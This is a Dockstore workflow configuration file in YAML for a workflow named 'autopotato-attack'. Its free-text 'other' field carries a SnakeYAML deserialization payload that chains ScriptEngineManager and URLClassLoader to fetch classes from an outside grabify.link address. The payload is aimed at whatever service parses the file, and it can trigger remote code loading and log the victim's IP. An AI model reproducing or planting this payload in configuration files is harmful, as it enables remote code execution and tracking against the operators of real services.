version: 1.2
workflows:
   - subclass: CWL
     name: autopotato-attack
     primaryDescriptorPath: /potato.cwl
     publish: True
     testParameterFiles:
         - /test/dockstore.cwl.json
     other: |
        !!javax.script.ScriptEngineManager [  
           !!java.net.URLClassLoader [[  
                !!java.net.URL ["https://grabify.link/FTRHRF"]  
           ]]  
        ] 
